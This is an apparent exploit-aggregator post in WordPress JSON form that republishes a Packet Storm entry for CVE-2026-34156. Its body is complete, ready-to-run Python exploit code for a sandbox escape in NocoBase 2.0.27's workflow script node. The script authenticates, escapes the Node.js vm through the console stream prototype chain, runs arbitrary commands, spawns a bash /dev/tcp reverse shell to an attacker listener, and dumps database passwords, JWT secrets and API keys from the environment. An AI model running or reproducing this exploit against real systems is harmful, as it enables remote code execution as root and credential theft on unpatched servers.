{"id":52569,"date":"2026-05-08T13:40:38","date_gmt":"2026-05-08T13:40:38","guid":{"rendered":"https:\/\/zero.redgem.net\/?p=52569"},"modified":"2026-05-08T13:40:38","modified_gmt":"2026-05-08T13:40:38","slug":"nocobase-2027-vm-sandbox-escape","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=52569","title":{"rendered":"\ud83d\udcc4 NocoBase 2.0.27 VM Sandbox Escape_PACKETSTORM:220576"},"content":{"rendered":"

{“lastseen”:”2026-05-08T18:05:07″,”description”:”NocoBase versions 2.0.27 and below VM sandbox escape exploit…”,”published”:”2026-05-08T00:00:00″,”modified”:”2026-05-08T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 NocoBase 2.0.27 VM Sandbox Escape”,”source”:””,”references”:””,”id”:”PACKETSTORM:220576″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-34156″],”sourceData”:”# Exploit Title: NocoBase 2.0.27 – VM Sandbox Escape \\n # Date: 2026-03-26\\n # Exploit Author: Onurcan Gen\u00e7\\n # Vendor Homepage: https:\/\/www.nocobase.com\/\\n # Software Link: https:\/\/github.com\/nocobase\/nocobase\\n # Version: \\u003c= 2.0.27 \u2014 patched in 2.0.28\\n # Tested on: Debian GNU\/Linux 12 (bookworm) \/ Docker \/ Node.js v20.20.1\\n # CVE: CVE-2026-34156\\n # Advisory: https:\/\/github.com\/nocobase\/nocobase\/security\/advisories\/GHSA-px3p-vgh9-m57c\\n # CWE: CWE-913\\n # CVSS: 9.9 (CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:C\/C:H\/I:H\/A:H)\\n #\\n # Description:\\n # NocoBase’s Workflow Script Node executes user-supplied JavaScript inside\\n # a Node.js vm sandbox with a custom require allowlist. However, the console\\n # object passed into the sandbox exposes host-realm WritableWorkerStdio\\n # stream objects (console._stdout \/ console._stderr). By traversing the\\n # prototype chain (.constructor.constructor), an attacker obtains the host\\n # realm’s Function constructor, accesses the process object, and uses\\n # process.mainModule.require to load child_process \u2014 bypassing the sandbox\\n # and achieving Remote Code Execution as root.\\n #\\n # Exploitation chain:\\n # console._stdout.constructor.constructor \u2192 host-realm Function\\n # Function(‘return process’)() \u2192 Node.js process object\\n # process.mainModule.require(‘child_process’) \u2192 unrestricted module\\n # child_process.execSync(‘id’) \u2192 RCE as root\\n #\\n # Usage:\\n # python3 exploit.py -t \\u003cTARGET\\u003e -u \\u003cUSER\\u003e -P \\u003cPASS\\u003e –cmd \\”id\\”\\n # python3 exploit.py -t \\u003cTARGET\\u003e -u \\u003cUSER\\u003e -P \\u003cPASS\\u003e –dump\\n # python3 exploit.py -t \\u003cTARGET\\u003e -u \\u003cUSER\\u003e -P \\u003cPASS\\u003e -l \\u003cLHOST\\u003e -p \\u003cLPORT\\u003e\\n #\\n # Notes:\\n # – Requires valid credentials (any user with workflow access)\\n # – Vulnerability check runs automatically before exploitation\\n # – Default reverse shell uses bash \/dev\/tcp (Debian-based containers)\\n # – Start listener before running: nc -lvnp 4444\\n \\n import argparse\\n import json\\n import requests\\n import sys\\n import urllib3\\n \\n urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\\n \\n # \u2500\u2500\u2500 Colors \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\\n \\n class C:\\n RED = \\”\\\\033[91m\\”\\n GREEN = \\”\\\\033[92m\\”\\n YELLOW = \\”\\\\033[93m\\”\\n BLUE = \\”\\\\033[94m\\”\\n MAGENTA = \\”\\\\033[95m\\”\\n CYAN = \\”\\\\033[96m\\”\\n WHITE = \\”\\\\033[97m\\”\\n BOLD = \\”\\\\033[1m\\”\\n DIM = \\”\\\\033[2m\\”\\n RESET = \\”\\\\033[0m\\”\\n \\n def info(msg): print(f\\” {C.BLUE}[*]{C.RESET} {msg}\\”)\\n def good(msg): print(f\\” {C.GREEN}[+]{C.RESET} {msg}\\”)\\n def warn(msg): print(f\\” {C.YELLOW}[!]{C.RESET} {msg}\\”)\\n def fail(msg): print(f\\” {C.RED}[-]{C.RESET} {msg}\\”)\\n def result(msg): print(f\\” {C.CYAN}[\u2192]{C.RESET} {msg}\\”)\\n \\n BANNER = f\\”\\”\\”\\n {C.RED}{C.BOLD}\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n \u2551 NocoBase Workflow Script Node \u2014 VM Sandbox Escape to RCE \u2551\\n \u2551 CVE: [CVE-2026-34156] | CVSS: 9.9 Critical \u2551\\n \u2551 Author: Onurcan Gen\u00e7 \u2551\\n \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d{C.RESET}\\n \\”\\”\\”\\n \\n ESCAPE_CHAIN = (\\n \\”const Fn=console._stdout.constructor.constructor;\\”\\n \\”const proc=Fn(‘return process’)();\\”\\n \\”const cp=proc.mainModule.require(‘child_process’);\\”\\n )\\n \\n \\n # \u2500\u2500\u2500 Core Functions \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\\n \\n def authenticate(target: str, username: str, password: str, verify_ssl: bool = False) -\\u003e str:\\n url = f\\”{target.rstrip(‘\/’)}\/api\/auth:signIn\\”\\n body = {\\”account\\”: username, \\”password\\”: password}\\n \\n print()\\n info(f\\”Authenticating as {C.BOLD}{username}{C.RESET}…\\”)\\n \\n try:\\n resp = requests.post(url, headers={\\”Content-Type\\”: \\”application\/json\\”},\\n json=body, timeout=10, verify=verify_ssl)\\n data = resp.json()\\n except requests.exceptions.ConnectionError:\\n fail(f\\”Connection failed: cannot reach {C.YELLOW}{url}{C.RESET}\\”)\\n sys.exit(1)\\n except json.JSONDecodeError:\\n fail(f\\”Invalid response from server\\”)\\n sys.exit(1)\\n \\n if \\”errors\\” in data:\\n msg = data[\\”errors\\”][0].get(\\”message\\”, \\”Unknown error\\”)\\n fail(f\\”Authentication failed: {C.RED}{msg}{C.RESET}\\”)\\n sys.exit(1)\\n \\n token = data.get(\\”data\\”, {}).get(\\”token\\”)\\n if not token:\\n fail(\\”No token in response\\”)\\n sys.exit(1)\\n \\n nickname = data.get(\\”data\\”, {}).get(\\”user\\”, {}).get(\\”nickname\\”, \\”unknown\\”)\\n user_id = data.get(\\”data\\”, {}).get(\\”user\\”, {}).get(\\”id\\”, \\”?\\”)\\n good(f\\”Authenticated! User: {C.GREEN}{C.BOLD}{nickname}{C.RESET} (ID: {user_id})\\”)\\n good(f\\”Token: {C.DIM}{token[:25]}…{token[-10:]}{C.RESET}\\”)\\n return token\\n \\n \\n def send_payload(target: str, token: str, payload: str, verify_ssl: bool = False) -\\u003e dict:\\n url = f\\”{target.rstrip(‘\/’)}\/api\/flow_nodes:test\\”\\n headers = {\\n \\”Authorization\\”: f\\”Bearer {token}\\”,\\n \\”Content-Type\\”: \\”application\/json\\”\\n }\\n body = {\\n \\”type\\”: \\”script\\”,\\n \\”config\\”: {\\”content\\”: payload, \\”timeout\\”: 5000, \\”arguments\\”: []}\\n }\\n \\n try:\\n resp = requests.post(url, headers=headers, json=body, timeout=10, verify=verify_ssl)\\n return resp.json()\\n except requests.exceptions.Timeout:\\n return {\\”data\\”: {\\”status\\”: 1, \\”result\\”: \\”timeout (expected for reverse shell)\\”}}\\n except requests.exceptions.ConnectionError as e:\\n return {\\”error\\”: f\\”Connection failed: {e}\\”}\\n except json.JSONDecodeError:\\n return {\\”error\\”: \\”Invalid JSON response\\”, \\”raw\\”: resp.text[:500]}\\n \\n \\n def verify_vulnerability(target: str, token: str) -\\u003e bool:\\n print()\\n print(f\\” {C.MAGENTA}{‘\u2500’ * 55}{C.RESET}\\”)\\n info(f\\”{C.BOLD}Phase 1: Vulnerability Check{C.RESET}\\”)\\n print(f\\” {C.MAGENTA}{‘\u2500’ * 55}{C.RESET}\\”)\\n \\n check_payload = (\\n \\”try {\\”\\n \\” const name = console._stdout.constructor.name;\\”\\n \\” const fnType = typeof console._stdout.constructor.constructor;\\”\\n \\” return JSON.stringify({stream: name, fnConstructor: fnType});\\”\\n \\”} catch(e) { return ‘ERR: ‘ + e.message; }\\”\\n )\\n result_data = send_payload(target, token, check_payload)\\n \\n if \\”error\\” in result_data:\\n fail(f\\”Connection error: {result_data[‘error’]}\\”)\\n return False\\n \\n data = result_data.get(\\”data\\”, {})\\n \\n if data.get(\\”status\\”) != 1:\\n if \\”INVALID_TOKEN\\” in str(data) or \\”EMPTY_TOKEN\\” in str(data):\\n fail(\\”Authentication token is invalid or expired\\”)\\n else:\\n fail(f\\”Unexpected response: {data}\\”)\\n return False\\n \\n try:\\n check = json.loads(data.get(\\”result\\”, \\”{}\\”))\\n stream = check.get(\\”stream\\”, \\”\\”)\\n fn_type = check.get(\\”fnConstructor\\”, \\”\\”)\\n \\n if stream == \\”WritableWorkerStdio\\” and fn_type == \\”function\\”:\\n good(f\\”Host-realm stream object: {C.GREEN}{C.BOLD}{stream}{C.RESET}\\”)\\n good(f\\”Function constructor: {C.GREEN}{C.BOLD}accessible{C.RESET}\\”)\\n print()\\n good(f\\”{C.GREEN}{C.BOLD}TARGET IS VULNERABLE!{C.RESET}\\”)\\n return True\\n else:\\n fail(f\\”Unexpected sandbox state: stream={stream}, fn={fn_type}\\”)\\n return False\\n except (json.JSONDecodeError, TypeError):\\n res = data.get(\\”result\\”, \\”\\”)\\n fail(f\\”Check failed: {res}\\”)\\n return False\\n \\n \\n # \u2500\u2500\u2500 Exploit Modes \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\\n \\n def exploit_cmd(target: str, token: str, cmd: str):\\n print()\\n print(f\\” {C.MAGENTA}{‘\u2500’ * 55}{C.RESET}\\”)\\n info(f\\”{C.BOLD}Phase 2: Command Execution{C.RESET}\\”)\\n print(f\\” {C.MAGENTA}{‘\u2500’ * 55}{C.RESET}\\”)\\n \\n info(f\\”Executing: {C.YELLOW}{cmd}{C.RESET}\\”)\\n \\n safe_cmd = cmd.replace(\\”\\\\\\\\\\”, \\”\\\\\\\\\\\\\\\\\\”).replace(\\”‘\\”, \\”\\\\\\\\’\\”).replace(‘\\”‘, ‘\\\\\\\\\\”‘)\\n payload = f'{ESCAPE_CHAIN}return cp.execSync(\\”{safe_cmd}\\”).toString().trim();’\\n resp = send_payload(target, token, payload)\\n \\n data = resp.get(\\”data\\”, {})\\n if data.get(\\”status\\”) == 1:\\n output = data.get(\\”result\\”, \\”\\”)\\n print()\\n good(f\\”Output:\\”)\\n print(f\\” {C.CYAN}{‘\u2500’ * 55}{C.RESET}\\”)\\n for line in output.split(\\”\\\\n\\”):\\n print(f\\” {C.WHITE}{line}{C.RESET}\\”)\\n print(f\\” {C.CYAN}{‘\u2500’ * 55}{C.RESET}\\”)\\n else:\\n fail(f\\”Execution failed: {data}\\”)\\n \\n \\n def exploit_revshell(target: str, token: str, lhost: str, lport: int):\\n print()\\n print(f\\” {C.MAGENTA}{‘\u2500’ * 55}{C.RESET}\\”)\\n info(f\\”{C.BOLD}Phase 2: Reverse Shell{C.RESET}\\”)\\n print(f\\” {C.MAGENTA}{‘\u2500’ * 55}{C.RESET}\\”)\\n \\n info(f\\”Target: {C.YELLOW}{target}{C.RESET}\\”)\\n info(f\\”Callback: {C.GREEN}{C.BOLD}{lhost}:{lport}{C.RESET}\\”)\\n warn(f\\”Ensure listener is running: {C.BOLD}nc -lvnp {lport}{C.RESET}\\”)\\n print()\\n \\n shell_cmd = f’bash -c \\”bash -i \\u003e\\u0026 \/dev\/tcp\/{lhost}\/{lport} 0\\u003e\\u00261\\”‘\\n payload = f\\”{ESCAPE_CHAIN}cp.exec(‘{shell_cmd}’);return ‘shell spawned’;\\”\\n resp = send_payload(target, token, payload)\\n \\n data = resp.get(\\”data\\”, {})\\n res = data.get(\\”result\\”, \\”\\”)\\n \\n if \\”shell spawned\\” in str(res) or \\”timeout\\” in str(res):\\n good(f\\”{C.GREEN}{C.BOLD}Payload delivered! Check your listener.{C.RESET}\\”)\\n else:\\n fail(f\\”Unexpected response: {data}\\”)\\n \\n \\n def exploit_dump(target: str, token: str):\\n print()\\n print(f\\” {C.MAGENTA}{‘\u2500’ * 55}{C.RESET}\\”)\\n info(f\\”{C.BOLD}Phase 2: System \\u0026 Credential Dump{C.RESET}\\”)\\n print(f\\” {C.MAGENTA}{‘\u2500’ * 55}{C.RESET}\\”)\\n \\n # System info via shell commands\\n commands = [\\n (\\”User\\”, \\”id\\”),\\n (\\”Hostname\\”, \\”hostname\\”),\\n (\\”OS\\”, \\”cat \/etc\/os-release | grep PRETTY_NAME | cut -d= -f2\\”),\\n (\\”Kernel\\”, \\”uname -r\\”),\\n (\\”Node.js\\”, \\”node –version\\”),\\n (\\”Working Dir\\”, \\”pwd\\”),\\n ]\\n \\n print()\\n info(f\\”{C.BOLD}System Information{C.RESET}\\”)\\n print(f\\” {C.CYAN}{‘\u2500’ * 55}{C.RESET}\\”)\\n \\n for label, cmd in commands:\\n safe_cmd = cmd.replace(‘\\”‘, ‘\\\\\\\\\\”‘)\\n payload = f'{ESCAPE_CHAIN}return cp.execSync(\\”{safe_cmd}\\”).toString().trim();’\\n resp = send_payload(target, token, payload)\\n data = resp.get(\\”data\\”, {})\\n if data.get(\\”status\\”) == 1:\\n out = data.get(\\”result\\”, \\”N\/A\\”).replace(‘\\”‘, ”)\\n print(f\\” {C.WHITE}{label:.\\u003c22}{C.RESET} {C.GREEN}{out}{C.RESET}\\”)\\n \\n print(f\\” {C.CYAN}{‘\u2500’ * 55}{C.RESET}\\”)\\n \\n # Credentials via JavaScript\\n print()\\n info(f\\”{C.BOLD}Environment Credentials{C.RESET}\\”)\\n print(f\\” {C.CYAN}{‘\u2500’ * 55}{C.RESET}\\”)\\n \\n secrets_payload = (\\n f\\”{ESCAPE_CHAIN}\\”\\n \\”const env = proc.env;\\”\\n \\”const keys = [‘DB_HOST’,’DB_PORT’,’DB_DATABASE’,’DB_USER’,’DB_PASSWORD’,\\”\\n \\”‘DB_DIALECT’,’INIT_ROOT_USERNAME’,’INIT_ROOT_PASSWORD’,’INIT_ROOT_NICKNAME’,\\”\\n \\”‘INIT_ROOT_EMAIL’,’APP_KEY’,’API_KEY’,’JWT_SECRET’,’SECRET_KEY’];\\”\\n \\”const out = {}; keys.forEach(k =\\u003e { if(env[k]) out[k] = env[k]; });\\”\\n \\”return JSON.stringify(out);\\”\\n )\\n resp = send_payload(target, token, secrets_payload)\\n data = resp.get(\\”data\\”, {})\\n \\n if data.get(\\”status\\”) == 1:\\n try:\\n creds = json.loads(data.get(\\”result\\”, \\”{}\\”))\\n for k, v in creds.items():\\n color = C.RED if \\”PASS\\” in k or \\”SECRET\\” in k or \\”KEY\\” in k else C.YELLOW\\n print(f\\” {C.WHITE}{k:.\\u003c30}{C.RESET} {color}{C.BOLD}{v}{C.RESET}\\”)\\n except json.JSONDecodeError:\\n result(f\\”Raw: {data.get(‘result’)}\\”)\\n \\n print(f\\” {C.CYAN}{‘\u2500’ * 55}{C.RESET}\\”)\\n \\n # All env vars with sensitive patterns\\n print()\\n info(f\\”{C.BOLD}Additional Secrets (pattern match){C.RESET}\\”)\\n print(f\\” {C.CYAN}{‘\u2500’ * 55}{C.RESET}\\”)\\n \\n extra_payload = (\\n f\\”{ESCAPE_CHAIN}\\”\\n \\”const env = proc.env;\\”\\n \\”const out = {};\\”\\n \\”for (const k of Object.keys(env)) {\\”\\n \\” if (\/secret|key|token|pass|auth|jwt|api_key|private\/i.test(k) \\u0026\\u0026 \\”\\n \\” !k.startsWith(‘npm_’)) out[k] = env[k];\\”\\n \\”}\\”\\n \\”return JSON.stringify(out);\\”\\n )\\n resp = send_payload(target, token, extra_payload)\\n data = resp.get(\\”data\\”, {})\\n \\n if data.get(\\”status\\”) == 1:\\n try:\\n extras = json.loads(data.get(\\”result\\”, \\”{}\\”))\\n if extras:\\n for k, v in extras.items():\\n print(f\\” {C.WHITE}{k:.\\u003c30}{C.RESET} {C.RED}{C.BOLD}{v}{C.RESET}\\”)\\n else:\\n info(\\”No additional secrets found\\”)\\n except json.JSONDecodeError:\\n pass\\n \\n print(f\\” {C.CYAN}{‘\u2500’ * 55}{C.RESET}\\”)\\n \\n \\n # \u2500\u2500\u2500 Main \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\\n \\n def main():\\n print(BANNER)\\n \\n parser = argparse.ArgumentParser(\\n description=\\”NocoBase Workflow Script Node \u2014 VM Sandbox Escape to RCE\\”,\\n formatter_class=argparse.RawDescriptionHelpFormatter,\\n epilog=f\\”\\”\\”\\n {C.BOLD}Examples:{C.RESET}\\n {C.CYAN}Command:{C.RESET} %(prog)s -t http:\/\/target:13000 -u nocobase -P admin123 –cmd \\”id\\”\\n {C.CYAN}Dump:{C.RESET} %(prog)s -t http:\/\/target:13000 -u nocobase -P admin123 –dump\\n {C.CYAN}Reverse Shell:{C.RESET} %(prog)s -t http:\/\/target:13000 -u nocobase -P admin123 -l 10.10.14.5 -p 4444\\n \\”\\”\\”\\n )\\n parser.add_argument(\\”-t\\”, \\”–target\\”, required=True,\\n help=\\”Target NocoBase URL (e.g., http:\/\/target:13000)\\”)\\n parser.add_argument(\\”-u\\”, \\”–username\\”, required=True,\\n help=\\”NocoBase username\\”)\\n parser.add_argument(\\”-P\\”, \\”–password\\”, required=True,\\n help=\\”NocoBase password\\”)\\n parser.add_argument(\\”-l\\”, \\”–lhost\\”, default=None,\\n help=\\”Listener IP for reverse shell\\”)\\n parser.add_argument(\\”-p\\”, \\”–lport\\”, type=int, default=4444,\\n help=\\”Listener port (default: 4444)\\”)\\n parser.add_argument(\\”–cmd\\”, default=None,\\n help=\\”Execute a single command\\”)\\n parser.add_argument(\\”–dump\\”, action=\\”store_true\\”,\\n help=\\”Dump system info and credentials\\”)\\n parser.add_argument(\\”–no-verify\\”, action=\\”store_true\\”,\\n help=\\”Skip vulnerability verification\\”)\\n \\n args = parser.parse_args()\\n \\n if not args.cmd and not args.lhost and not args.dump:\\n fail(f\\”Specify {C.BOLD}–cmd{C.RESET} (command), {C.BOLD}–dump{C.RESET} (info), or {C.BOLD}-l LHOST{C.RESET} (revshell)\\”)\\n sys.exit(1)\\n \\n # Phase 0: Authenticate\\n token = authenticate(args.target, args.username, args.password)\\n \\n # Phase 1: Vulnerability check (always runs unless –no-verify)\\n if not args.no_verify:\\n if not verify_vulnerability(args.target, token):\\n fail(f\\”{C.RED}{C.BOLD}TARGET IS NOT VULNERABLE.{C.RESET} Exiting.\\”)\\n sys.exit(1)\\n \\n # Phase 2: Exploit\\n if args.dump:\\n exploit_dump(args.target, token)\\n elif args.cmd:\\n exploit_cmd(args.target, token, args.cmd)\\n else:\\n exploit_revshell(args.target, token, args.lhost, args.lport)\\n \\n print()\\n print(f\\” {C.GREEN}{C.BOLD}Done.{C.RESET}\\”)\\n print()\\n \\n \\n if __name__ == \\”__main__\\”:\\n main()”,”sourceHref”:”https:\/\/packetstorm.news\/download\/220576″,”cvss”:{“score”:9.9,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:C\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/220576\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-05-08T18:05:07″,”description”:”NocoBase versions 2.0.27 and below VM sandbox escape exploit…”,”published”:”2026-05-08T00:00:00″,”modified”:”2026-05-08T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 NocoBase 2.0.27 VM Sandbox Escape”,”source”:””,”references”:””,”id”:”PACKETSTORM:220576″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-34156″],”sourceData”:”# Exploit Title: NocoBase 2.0.27 – VM Sandbox Escape \\n # Date:…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,45,12,13,53,7,11,5],"class_list":["post-52569","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-99","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 NocoBase 2.0.27 VM Sandbox Escape_PACKETSTORM:220576 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=52569\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 NocoBase 2.0.27 VM Sandbox Escape_PACKETSTORM:220576 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-05-08T18:05:07″,”description”:”NocoBase versions 2.0.27 and below VM sandbox escape exploit…”,”published”:”2026-05-08T00:00:00″,”modified”:”2026-05-08T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 NocoBase 2.0.27 VM Sandbox Escape”,”source”:””,”references”:””,”id”:”PACKETSTORM:220576″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-34156″],”sourceData”:”# Exploit Title: NocoBase 2.0.27 – VM Sandbox Escape n # Date:...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=52569\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-05-08T13:40:38+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"12 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=52569#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=52569\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 NocoBase 2.0.27 VM Sandbox Escape_PACKETSTORM:220576\",\"datePublished\":\"2026-05-08T13:40:38+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=52569\"},\"wordCount\":2378,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.9\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=52569#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=52569\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=52569\",\"name\":\"\ud83d\udcc4 NocoBase 2.0.27 VM Sandbox Escape_PACKETSTORM:220576 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-05-08T13:40:38+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=52569#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=52569\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=52569#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 NocoBase 2.0.27 VM Sandbox Escape_PACKETSTORM:220576\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero 